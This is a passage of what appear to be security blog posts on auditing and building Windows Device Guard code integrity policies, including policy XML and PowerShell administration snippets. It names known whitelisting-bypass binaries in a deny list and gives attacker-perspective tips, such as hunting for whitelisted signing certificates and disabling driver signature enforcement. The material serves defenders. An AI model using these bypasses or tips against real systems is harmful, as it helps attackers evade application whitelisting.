Implications: Attackers will need to come armed with UMCI bypasses to circumvent this protection. Casey Smith (@subtee), Matt Nelson (@enigma0x3), and I have been doing a lot of research lately in developing UMCI bypasses. To date, we’ve discussed some of these bypasses publicly. As of this writing, we also have several open cases with MSRC addressing many more UMCI issues. Our research has focused on discovering trusted binaries that allow us to execute unsigned code, Device Guard implementation flaws, and PowerShell Constrained Language mode bypasses. We hope to see fixes implemented for all the issues we reported.

Attackers seeking to circumvent Device Guard should be aware of UMCI bypasses as this is often the easiest way to circumvent a Device Guard deployment.

3) Required:WHQL

Description: All drivers must be WHQL signed as indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.

Implications: This setting raises the bar for trust and integrity of the drivers that are allowed to load.

4) Disabled:Flight Signing

Description: Flight signed code will be prevented from loading. This should only affect the loading of Windows Insider Preview code.

Implications: It is recommended that this setting be enabled. This will preclude you from running Insider Preview builds, however. Flight signed code does not go through the rigorous testing that code for a general availability release would go through (I say so speculatively).

5) Enabled:Unsigned System Integrity Policy

Description: This setting indicates that Device Guard does not require that the code integrity policy be signed. Code Integrity policy signing is a very effective mitigation against CI policy tampering as it makes it so that only code signing certificates included in the UpdatePolicySigners section are authorized to make CI policy changes.

Implications: An attacker would need to steal one of the approved code signing certificates to make changes; therefore, it is critical that these code signing certificates be well protected. It should go without saying that the certificate used to sign a policy should not be present on a system where the code integrity policy is deployed. More generally, no code signing certificates that are whitelisted per policy should be present on any Device Guard protected system.

6) Enabled:Advanced Boot Options Menu

Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled. The presence of this rule indicates that a user with physical access can access the menu.

Implications: An attacker with physical access will have the ability to remove deployed code integrity policies. If this is a realistic threat for you, then it is critical that BitLocker be deployed and a UEFI password be set. Additionally, since the “Enabled:Unsigned System Integrity Policy” option is set, an attacker could simply replace the existing, deployed code integrity policy with one of their own which permits their code to execute.

Analysis/recommendations: Policy Rules


After thorough testing has been performed, I would recommend the following:
  1. Remove "Enabled:Unsigned System Integrity Policy" and sign the policy. This is an extremely effective way to prevent policy tampering.
  2. Remove "Enabled:Advanced Boot Options Menu". This is an effective mitigation against certain physical attacks.
  3. If possible, enable "Required:EV Signers". This is likely not feasible, however, since not all required drivers will be EV signed.

SigningScenario analysis

At this point, we’re interested in identifying what is whitelisted and what is blacklisted. The most efficient place to start is by analyzing the SigningScenarios section and working our way backwards.

There will be at most two SigningScenarios:

  • ID_SIGNINGSCENARIO_DRIVERS_1 - these rules only apply to drivers
  • ID_SIGNINGSCENARIO_WINDOWS - these rules only apply to user mode code

ID_SIGNINGSCENARIO_DRIVERS_1


The following driver signers are whitelisted:

- ID_SIGNER_S_1_0_0_0_0_0_0_0
  Name: Microsoft Windows Production PCA 2011
  TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_AE_0_0_0_0_0_0_0
  Name: Intel External Basic Policy CA
  TBS: 53B052BA209C525233293274854B264BC0F68B73
- ID_SIGNER_S_AF_0_0_0_0_0_0_0
  Name: Microsoft Windows Third Party Component CA 2012
  TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_17C_0_0_0_0_0_0_0
  Name: COMODO RSA Certification Authority
  TBS: 7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D
- ID_SIGNER_S_18D_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA 2010
  TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2E0_0_0_0_0_0_0_0
  Name: VeriSign Class 3 Code Signing 2010 CA
  TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
- ID_SIGNER_S_34C_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA
  TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_34F_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA 2011
  TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_37B_0_0_0_0_0_0_0
  Name: Microsoft Root Certificate Authority
  TBS: 391BE92883D52509155BFEAE27B9BD340170B76B
- ID_SIGNER_S_485_0_0_0_0_0_0_0
  Name: Microsoft Windows Verification PCA
  TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918

TBS description:

The "Name" attribute is derived from the CN of the certificate. Ultimately, Device Guard doesn't validate the CN. In fact, the "Name" attribute is not present in a binary CI policy (i.e. SIPolicy.p7b). Rather, it validates the TBS (ToBeSigned) hash which is basically a hash of the certificate as dictated by the signature algorithm in the certificate (MD5, SHA1, SHA256, SHA384, SHA512). You can infer the hash algorithm used based on the length of the hash. If you're interested to learn how the hash is calculated, I recommend you load Microsoft.Config.CI.Commands.dll in a decompiler and inspect the Microsoft.SecureBoot.UserConfig.Helper.CalculateTBS method.

Signer hashing algorithms used:

SHA1:
 * Intel External Basic Policy CA
 * VeriSign Class 3 Code Signing 2010 CA
 * Microsoft Code Signing PCA
 * Microsoft Root Certificate Authority
 * Microsoft Windows Verification PCA

Note: Microsoft advises against using a SHA1 signature algorithm and is phasing the algorithm out for certificates. See https://aka.ms/sha1. It may well be within the realm of possibility for even a non-state actor to generate a certificate with a SHA1 hash collision.

SHA256:
 * Microsoft Windows Production PCA 2011
 * Microsoft Windows Third Party Component CA 2012
 * Microsoft Code Signing PCA 2010
 * Microsoft Code Signing PCA 2011

SHA384:
 * COMODO RSA Certification Authority

Analysis/recommendations: Driver rules


Overall, I would say the driver rules may be overly permissive. First of all, any driver signed with any of those certificates would be permitted to load. For example, I would imagine that most, if not all, Intel drivers are signed with the same certificate. So, if a vulnerable driver that had no business on your system was signed with one of those certificates, it could be loaded and exploited to gain unsigned kernel code execution. My recommendation for third party driver certificates is that you whitelist each individual required third party driver using the FilePublisher or, preferably, the WHQLFilePublisher (if the driver happens to be WHQL signed) file rule level. An added benefit of the FilePublisher rule is that the whitelisted driver will only load if the file version is equal to or greater than what is specified. This means that if there is an older, known vulnerable version of the driver you need, the old version will not be authorized to load.

Another potential issue that I could speculatively anticipate is with the "Microsoft Windows Third Party Component CA 2012" certificate. My understanding is that Microsoft uses this certificate to co-sign 3rd party software. Because this certificate seems to be used so heavily by 3rd party vendors, it potentially opens the door to a large amount of vulnerable software. To mitigate this, you can use the WHQLPublisher or WHQLFilePublisher rule level when creating a code integrity policy. When those options are selected, if an OEM vendor name is associated with a driver, a CertOemID attribute will be applied to its signer. For example, you could use this feature to whitelist only Apple drivers that are co-signed with the "Microsoft Windows Third Party Component CA 2012" certificate.
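A minimal sketch of generating such driver rules (the scan path is illustrative):

# Scan only the directory containing the required third party drivers
$Drivers = Get-SystemDriver -ScanPath C:\RequiredDrivers

# Generate rules keyed to signer, OriginalFileName, and minimum file version,
# falling back to FilePublisher for drivers that are not WHQL signed
New-CIPolicy -FilePath .\DriverPolicy.xml -DriverFiles $Drivers -Level WHQLFilePublisher -Fallback FilePublisher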

ID_SIGNINGSCENARIO_WINDOWS


The following user-mode code signers are whitelisted (based on their presence in AllowedSigners):

- ID_SIGNER_S_1_1_0_0_0_0_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_1_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) Intel_ICG
- ID_SIGNER_S_2_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_4_1_0_0_0
   Name: Matthew Graeber
   TBS: B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A
- ID_SIGNER_S_19_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) pGFX
- ID_SIGNER_S_20_1_0
   Name: iKGF_AZSKGFDCS
   TBS: 32656594870EFFE75251652A99B906EDB92D6BB0
   CertPublisher: IntelVPGSigning2016
- ID_SIGNER_S_4E_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_65_1_0
   Name: VeriSign Class 3 Code Signing 2010 CA
   TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
   CertPublisher: Logitech
- ID_SIGNER_S_35C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_35F_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_1EA5_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2316_1_0_0_0_0_0_0
   Name: Microsoft Windows Verification PCA
   TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918
- ID_SIGNER_S_3D8C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 7251ADC0F732CF409EE462E335BB99544F2DD40F

The following user-mode code blacklist rules are present (based on their presence in DeniedSigners):

- ID_SIGNER_F_1_0_0_1_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
     4) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_2_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_3_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: csi.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_4_0_0_1_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
   CertPublisher: Microsoft Windows
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0

Analysis/recommendations: User-mode rules

Whoever created this policy is clearly mindful of and actively blocking known UMCI bypasses. The downside is that there have since been additional bypasses reported publicly - e.g. dnx.exe from Matt Nelson (@enigma0x3). As a defender employing application whitelisting solutions, it is critical to stay up to date on current bypasses. If not, you're potentially one trusted binary/script away from further compromise.

You may have noticed what seems like an arbitrary selection of "99.0.0.0" for the minimum file version. You can interpret this as follows: any file matching a block rule with a version number less than 99.0.0.0 will be blocked. It is fairly reasonable to assume that a binary won't exceed version 99.0.0.0, but I've recently seen several files with versions in the hundreds, so I now recommend setting MinimumFileVersion for each FilePublisher block rule to 999.999.999.999. Unfortunately, at the time of writing, you cannot block an executable by only its signature and OriginalFileName. I hope this will change in the future.

As for the whitelisted signers, I wouldn't have a ton to recommend. As an attacker though, I might try to find executables/scripts signed with the "Matthew Graeber" certificate. This sounds like it would be an easy thing to do but Microsoft actually does not provide an official means of associating an executable or script to a CI policy rule. Ideally, Microsoft would provide a Test-CIPolicy cmdlet similar to the Test-AppLockerPolicy cmdlet. I'm in the process of writing one now.

Overall, there are no signers that stick out to me as worthy of additional investigation. Obviously, Microsoft signers will need to be permitted (and in a non-restrictive fashion) if OS updates are to be accepted. It appears as though there is some required Intel software present on the system. If anything, I might try to determine why the Intel software is required.


UpdatePolicySigners analysis

There is only a single UpdatePolicySigner: "Matthew Graeber". So while the effort was made to permit that code signing certificate to sign the policy, the "Enabled:Unsigned System Integrity Policy" policy rule was still set. Considering the intent to sign the policy was there, I would certainly recommend that the "Enabled:Unsigned System Integrity Policy" rule be removed and that signed policies be enforced. As an attacker, I would also look for the presence of this code signing certificate on the same system. It should go without saying that a whitelisted code signing certificate should never be present on a Device Guard-enabled system that whitelists that certificate.
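A minimal sketch of that hunt across the local certificate stores:

# Enumerate code signing certificates present in any local certificate store
Get-ChildItem -Path Cert:\ -Recurse -CodeSigningCert |
    Select-Object Subject, Thumbprint, PSParentPath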

HvciOptions analysis

HvciOptions is set to "1", indicating that HVCI is enabled and that the system will benefit from additional kernel exploitation protections. I cannot recommend setting HVCI to strict mode (a combined value of 3 - Enabled plus Strict) yet, as it is almost certain that there will be some drivers that are not compliant with strict mode.

Conclusion

I'll state again that this analysis has been subjective. An effective policy on one system that has a particular purpose likely won't be effective on another piece of hardware with a separate purpose. Getting CI policy configuration "right" is indeed a challenge. It takes experience and knowledge of the CI policy schema, and it requires that you apply an attacker's mindset when auditing a policy.

It is worth noting that even despite having an extremely locked down policy, the OS is still at the mercy of UMCI bypasses. For this very reason, Device Guard should be merely a component of a layered defense. It is certainly recommended that anti-malware solutions be installed side by side with Device Guard. For example, in a post-exploitation scenario, Device Guard will do nothing about the exfiltration of sensitive data using a simple batch script or PowerShell script operating in constrained language mode.

I will leave the comments section open to encourage discussion about your thoughts on CI policy assessment and how you think this example policy might have additional vulnerabilities. I feel as though I'm breaking new ground here, since there is no other information available regarding Device Guard policy audit methodology, so I am certainly open to candid feedback.

On the Effectiveness of Device Guard User Mode Code Integrity

Is a security feature with known bypasses pointless?

I felt compelled to answer this question after seeing several tweets recently claiming that Device Guard User Mode Code Integrity (UMCI) is a pointless security mechanism considering all of the recently reported bypasses. Before specifically diving into UMCI and its merits (or lack thereof), let’s use an analogy in the physical world to put things into perspective - a door.

Consider the door at the front of your home or business. This door helps serve as the primary mechanism to prevent intruders from breaking, entering, and stealing your assets. Let's say it's a solid wood door for the sake of the analogy. How might an attacker go about bypassing it?

  • They could pick the lock
  • They could compromise the latch with a shimming device
  • They could chop the door down with an ax
  • They could compromise the door and the hinges with a battering ram

Now, there are certainly better doors out there. You could purchase a blast door and have it be monitored with a 24/7 armed guard. Is that measure realistic? Maybe. It depends on the value of the assets you want to protect. Realistically, it's probably not worth your money since you suspect that a full frontal assault of enemy tanks is not a part of your threat model.

Does a determined attacker ultimately view the door as a means of preventing them from gaining access to your valuable assets? Of course not. Does the attacker even need to bypass the door? Probably not. They could also:

  • Go through the window
  • Break through a wall
  • Hide in the store during business hours and wait for everyone to leave
  • Submit their resume, get a job, develop trust, and slowly, surreptitiously steal your assets

So, will a door prevent breaches in all cases? Absolutely not. Will it prevent or deter an attacker lacking a certain amount of skill from breaking and entering? Sure. Other than preventing the elements from entering your store, does the locked door serve a purpose? Of course. It is a preventative mechanism suitable for the threat model that you choose to accept or mitigate against. The door is a baseline preventative mechanism employed in conjunction with a layered defense consisting of other preventative (reinforced, locked windows) and detective (motion sensors, video cameras, etc.) measures.




Now let's get back to the comfortable world of computers. Is a preventative security technology completely pointless if there are known bypasses? Specifically, let’s focus on Device Guard user mode code integrity (UMCI) as it’s received a fair amount of attention as of late. Considering all of the public bypasses posted, does it still serve a purpose? I won't answer that question using absolutes. Let me make a few proposals and let you, the reader, decide. Consider the following:

1) A bypass that applies to Device Guard UMCI is extremely likely to apply to all application whitelisting solutions. I would argue that Device Guard UMCI goes above and beyond other offerings. For example, UMCI places PowerShell (one of the largest user-mode attack surfaces) into constrained language mode, preventing PowerShell from being used to execute arbitrary, unsigned code. Other whitelisting solutions don’t even consider the attack surface posed by PowerShell. Device Guard UMCI also applies code integrity rules to DLLs. There is no way around this. Other solutions allow for DLL whitelisting but not by default.

2) Device Guard UMCI, as with any whitelisting solution, is extremely effective against post-exploitation activities that are not aware of UMCI bypasses. The sheer number of attacks that app-whitelisting prevents without any fancy machine learning is astonishing. I can say first hand that every piece of “APT” malware I reversed in a previous gig would almost always drop an unsigned binary to disk. Even in the cases where PowerShell was used, .NET methods were used heavily - something that constrained language mode would have outright prevented.

3) The majority of the "misplaced trust" binaries (e.g. MSBuild.exe, cdb.exe, dnx.exe, rcsi.exe, etc.) can be blocked with Device Guard code integrity policy updates. Will there be more bypass binaries? Of course. Again, these binaries will also likely circumvent all app-whitelisting solutions as well. Does it require an active effort to stay on top of all the bypasses as a defender? Yes. Deal with it.

Now, I, along with awesome people like Casey Smith (@subtee) and Matt Nelson (@enigma0x3), have reported our share of UMCI bypasses to Microsoft for which there is no code integrity policy mitigation. We have been in the trenches and have seen first hand just how bad some of the bypasses are. We are desperately holding out hope that Microsoft will come through, issue CVEs, and apply fixes for all of the issues we’ve reported. If they do, that will set a precedent and serve as proof that they are taking UMCI seriously. If not, I will start to empathize a bit more with those who claim that Device Guard is pointless. After all, we’re starting to see more attackers “live off the land” and leverage built-in tools to host their malware. Vendors need to be taking that seriously.

Ultimately, Device Guard UMCI is just another security feature that a defender should consider from a cost/benefit analysis based on threats faced and the assets they need to defend. It will always be vulnerable to bypasses, but raises the baseline bar of security. Going back to the analogy above, a door can always be bypassed but you should be able to detect an attacker breaking in and laying their hands on your valuable assets. So obviously, you would want to use additional security solutions along with Device Guard - e.g. Windows Event Forwarding, an anti-malware solution, and to perform periodic compromise/hunt assessments.

What I’m about to say might be scandalous, but I sincerely think that application whitelisting should be the new norm. You probably won’t encounter any organizations that don’t employ an anti-malware solution despite the innumerable bypasses. These days, anti-malware solutions are assumed to be a security baseline, and I think whitelisting should be as well, despite the innumerable bypasses that will surface over time. Personally, I would ask any defender to seriously consider it, and I would encourage all defenders to hold whitelisting solution vendors' feet to the fire and hold them accountable when there are bypasses for which there is no obvious mitigation.


I look forward to your comments here or in a lively debate on Twitter!

Code Integrity on Nano Server: Tips/Gotchas

Although it's not explicitly called out as being supported in Microsoft documentation, it turns out that you can deploy a code integrity policy to Nano Server, enabling enforcement of user and kernel-mode code integrity. It is refreshing to know that code integrity is now supported across all modern Windows operating systems (Win 10 Enterprise, Win 10 IoT, and Server 2016 including Nano Server), even though Microsoft doesn't make that well known. Now, while it is possible to enforce code integrity on Nano Server, you should be aware of some of the caveats, which I intend to enumerate in this post.

Code Integrity != Device Guard

Do note that until now, there has been no mention of Device Guard. This was intentional. Nano Server does not support Device Guard - only code integrity (CI), a subset of the supported Device Guard features. So what's the difference you ask?

  • There are no ConfigCI cmdlets. These cmdlets are what allow you to build code integrity policies. I'm not going to try to speculate around the rationale for not including them in Nano Server but I doubt you will ever see them. In order to build a policy, you will need to build it from a system that does have the ConfigCI cmdlets.
  • Because there are no ConfigCI cmdlets, you cannot use the -Audit parameter of Get-SystemDriver and New-CIPolicy to build a policy based on blocked binaries in the Microsoft-Windows-CodeIntegrity/Operational event log. If you want to do this (an extremely realistic scenario), you have to get comfortable pulling out and parsing blocked binary paths yourself using Get-WinEvent. When calling Get-WinEvent, you'll want to do so from an interactive PSSession rather than calling it from Invoke-Command. By default, event log properties don't get serialized and you need to access the properties to pull out file paths.
  • In order to scan files and parse Authenticode and catalog signatures, you will need to either copy the target files from a PSSession (i.e. Copy-Item -FromSession) or mount Nano Server partitions as a file share. You will need to do the same thing with the CatRoot directory - C:\Windows\System32\CatRoot. Fortunately, Get-SystemDriver and New-CIPolicy support explicit paths using the -ScanPath and -PathToCatroot parameters (see the sketch after this list). It may not be obvious, but you have to build your rules off the Nano Server catalog signers, not those of some other system, because the other system is unlikely to contain the hashes of the binaries present on Nano Server.
  • There is no Device Guard WMI provider (ROOT\Microsoft\Windows\DeviceGuard). Without this WMI class, it is difficult to audit code integrity enforcement status at scale remotely.
  • There is no Microsoft-Windows-DeviceGuard/Operational event log so there is no log to indicate when a new CI policy was deployed. This event log is useful for alerting a defender to code integrity policy and virtualization-based security (VBS) configuration tampering.
  • Since Nano Server does not have Group Policy, there is no way to configure a centralized CI policy path, VBS settings, or Credential Guard settings. I still need to dig in further to see if any of these features are even supported in Nano Server. For example, I would really want Nano Server to support UEFI CI policy protection.
  • PowerShell is not placed into constrained language mode even with user-mode code integrity (UMCI) enforcement enabled. Despite PowerShell running on .NET Core, you still have a rich reflection API to interface with Win32 - i.e. gain arbitrary unsigned code execution. With PowerShell not in constrained language mode (it's in FullLanguage mode), this means that signature validation won't be enforced on your scripts. I tried turning on constrained language mode by setting the __PSLockdownPolicy system environment variable, but PowerShell Core doesn't seem to acknowledge it. Signature enforcement of scripts/modules in PowerShell is independent of Just Enough Administration (JEA) but you should also definitely consider using JEA in Nano Server to enforce locked down remote session configurations.
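A minimal sketch of the remote-scan workflow mentioned above, assuming the Nano Server system drive is mounted at N: and its CatRoot directory has been copied to C:\NanoCatRoot (both paths are illustrative):

# Scan the mounted Nano Server volume, resolving catalog signatures from
# the catalog files copied off the Nano Server install
$NanoFiles = Get-SystemDriver -ScanPath N:\ -UserPEs -PathToCatroot C:\NanoCatRoot
New-CIPolicy -FilePath .\NanoPolicy.xml -DriverFiles $NanoFiles -Level PcaCertificate -Fallback Hash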

Well then what is supported on Nano Server? Not all is lost. You still get the following:

  • The Microsoft-Windows-CodeIntegrity/Operational event log so you can view which binaries were blocked per code policy.
  • You still deploy SIPolicy.p7b to C:\Windows\System32\CodeIntegrity. When SIPolicy.p7b is present in that directory, Nano Server will begin enforcing the rules after a reboot. A deployment sketch follows below.
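A minimal deployment sketch over PowerShell remoting (the computer name and policy paths are illustrative):

# Convert the XML policy to binary form and push it to the CodeIntegrity directory
ConvertFrom-CIPolicy -XmlFilePath .\NanoPolicy.xml -BinaryFilePath .\SIPolicy.p7b

$Session = New-PSSession -ComputerName NanoServer01
Copy-Item -Path .\SIPolicy.p7b -Destination C:\Windows\System32\CodeIntegrity\ -ToSession $Session

# Enforcement begins after a reboot
Restart-Computer -ComputerName NanoServer01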

Configuration/deployment/debugging tips/tricks

I wanted to share with you the way in which I dealt with some of the headaches involved in configuring, deploying, and debugging issues associated with code integrity on Nano Server.

Event log parsing

Since you don't get the -Audit parameter in the Get-SystemDriver and New-CIPolicy cmdlets, if you choose to base your policy off audit logs, you will need to pull out blocked binary paths yourself. When in audit mode, binaries that would have been blocked generate EID 3076 events. The path of the binary is populated via the second event parameter. The paths need to be normalized and converted to a proper file path from the raw device path. Here is some sample code that I used to obtain the paths of blocked binaries from the event log:

$BlockedBinaries = Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -FilterXPath '*[System[EventID=3076]]' | ForEach-Object {
    $UnnormalizedPath = $_.Properties[1].Value.ToLower()

    $NormalizedPath = $UnnormalizedPath

    if ($UnnormalizedPath.StartsWith('\device\harddiskvolume3')) {
        $NormalizedPath = $UnnormalizedPath.Replace('\device\harddiskvolume3', 'C:')
    } elseif ($UnnormalizedPath.StartsWith('system32')) {
        $NormalizedPath = $UnnormalizedPath.Replace('system32', 'C:\windows\system32')
    }

    $NormalizedPath
} | Sort-Object -Unique

Working through boot failures

There were times when the system wouldn't boot because my kernel-mode rules were too strict in enforcement mode. For example, when I neglected to add hal.dll to the whitelist, obviously, the OS wouldn't boot. While I worked through these problems, I would boot into the advanced boot options menu (by pressing F8) and disable driver signature enforcement for that session. This was an easy workaround to gain access to the system without having to boot from external WinPE media to redeploy a better, bootable CI policy. Note that the advanced boot menu is only made available to you if the "Enabled:Advanced Boot Options Menu" policy rule option is present in your CI policy. Obviously, disabling driver signature enforcement is a way to completely circumvent kernel-mode code integrity enforcement.

Completed code integrity policy

After going through many of the phases of an initial deny-all approach as described in my previous post on code integrity policy development, this is the relatively locked CI policy that I got to work on my Nano Server bare metal install (Intel NUC):

<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>1.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>
      <Option>Enabled:Advanced Boot Options Menu</Option>
    </Rule>
    <Rule>
      <Option>Enabled:UMCI</Option>
    </Rule>
    <Rule>
      <Option>Disabled:Flight Signing</Option>
    </Rule>
  </Rules>
  <!--EKUS-->
  <EKUs />
  <!--File Rules-->
  <FileRules>
    <!--This is the only non-OEM, 3rd party driver I needed for my Intel NUC-->
    <!--I was very specific with this driver rule but flexible with all other MS drivers.-->
    <FileAttrib ID="ID_FILEATTRIB_F_1" FriendlyName="e1d64x64.sys FileAttribute" FileName="e1d64x64.sys" MinimumFileVersion="12.15.22.3" />
  </FileRules>
  <!--Signers-->
  <Signers>
    <Signer ID="ID_SIGNER_F_1" Name="Intel External Basic Policy CA">
      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />
      <CertPublisher Value="Intel(R) INTELNPG1" />
      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />
    </Signer>
    <Signer ID="ID_SIGNER_F_2" Name="Microsoft Windows Third Party Component CA 2012">
      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />
      <CertPublisher Value="Microsoft Windows Hardware Compatibility Publisher" />
      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />
    </Signer>
    <Signer ID="ID_SIGNER_S_3" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />
      <CertPublisher Value="Microsoft Windows" />
    </Signer>
    <Signer ID="ID_SIGNER_S_4" Name="Microsoft Code Signing PCA">
      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />
      <CertPublisher Value="Microsoft Corporation" />
    </Signer>
    <Signer ID="ID_SIGNER_S_5" Name="Microsoft Code Signing PCA 2011">
      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />
      <CertPublisher Value="Microsoft Corporation" />
    </Signer>
    <Signer ID="ID_SIGNER_S_6" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />
      <CertPublisher Value="Microsoft Windows Publisher" />
    </Signer>
    <Signer ID="ID_SIGNER_S_2" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />
      <CertPublisher Value="Microsoft Windows" />
    </Signer>
    <Signer ID="ID_SIGNER_S_1" Name="Microsoft Code Signing PCA 2010">
      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />
    </Signer>
  </Signers>
  <!--Driver Signing Scenarios-->
  <SigningScenarios>
    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Kernel-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSigner SignerId="ID_SIGNER_S_1" />
          <AllowedSigner SignerId="ID_SIGNER_S_2" />
          <AllowedSigner SignerId="ID_SIGNER_F_1" />
          <AllowedSigner SignerId="ID_SIGNER_F_2" />
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSigner SignerId="ID_SIGNER_S_3" />
          <AllowedSigner SignerId="ID_SIGNER_S_4" />
          <AllowedSigner SignerId="ID_SIGNER_S_5" />
          <AllowedSigner SignerId="ID_SIGNER_S_6" />
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
  </SigningScenarios>
  <UpdatePolicySigners />
  <CiSigners>
    <CiSigner SignerId="ID_SIGNER_S_3" />
    <CiSigner SignerId="ID_SIGNER_S_4" />
    <CiSigner SignerId="ID_SIGNER_S_5" />
    <CiSigner SignerId="ID_SIGNER_S_6" />
  </CiSigners>
  <HvciOptions>0</HvciOptions>
</SiPolicy>

I conducted the following phases to generate this policy:
  1. Generate a default, deny-all policy by calling New-CIPolicy on an empty directory. I also increased the size of the Microsoft-Windows-CodeIntegrity/Operational event log to 20 MB (see the snippet after this list) to account for the large number of 3076 events I expected while deploying the policy in audit mode. I also focused only on drivers for this phase, so I didn't initially include the "Enabled:UMCI" option. My approach moving forward will be to focus on drivers first and then user-mode rules so as to minimize unnecessary cross-pollination between rule sets.
  2. Reboot and start pulling out blocked driver paths from the event log. I wanted to use the WHQLFilePublisher rule for the drivers but apparently, none of them were WHQL signed despite some of them certainly appearing to be WHQL signed. I didn't spend too much time diagnosing this issue since I have never been able to successfully get the WHQLFilePublisher rule to work. Instead, I resorted to the FilePublisher rule.
